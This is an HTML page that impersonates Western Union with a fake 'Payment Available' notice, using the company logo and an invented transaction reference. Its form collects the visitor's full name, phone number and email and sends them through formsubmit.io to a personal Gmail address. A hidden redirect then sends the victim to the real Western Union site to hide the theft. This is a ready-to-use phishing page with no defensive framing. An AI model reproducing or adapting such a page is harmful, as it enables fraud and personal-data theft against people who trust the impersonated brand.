
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Western Union - Payment Notice</title>
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" />
  <style>
    body {
      background-color: #f8f9fa;
      font-family: Arial, sans-serif;
    }
    .card {
      max-width: 500px;
      margin: 50px auto;
      padding: 20px;
      border-radius: 16px;
      box-shadow: 0 0 20px rgba(0,0,0,0.1);
    }
    .wu-logo {
      display: block;
      margin: 0 auto 20px;
      width: 150px;
    }
  </style>
</head>
<body>
  <div class="card">
    <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/0/03/Western_Union_logo.svg/2560px-Western_Union_logo.svg.png" alt="Western Union" class="wu-logo">
    <h3 class="text-center text-success">Payment Available</h3>
    <p class="text-center">You have received a new money transfer via Western Union.</p>
    <p class="text-center fw-bold">Transaction Reference: <span class="text-primary">WU-20250602-AX34</span></p>
    <form action="https://formsubmit.io/send/pwercoin@gmail.com" method="POST">
      <input name="_redirect" type="hidden" value="https://westernunion.com" />
      <div class="mb-3">
        <label for="fullname" class="form-label">Full Name</label>
        <input type="text" class="form-control" id="fullname" name="Full Name" required>
      </div>
      <div class="mb-3">
        <label for="phone" class="form-label">Phone Number</label>
        <input type="text" class="form-control" id="phone" name="Phone Number" required>
      </div>
      <div class="mb-3">
        <label for="email" class="form-label">Email Address</label>
        <input type="email" class="form-control" id="email" name="Email Address">
      </div>
      <button type="submit" class="btn btn-warning w-100">View Payment Details</button>
    </form>
  </div>
</body>
</html>
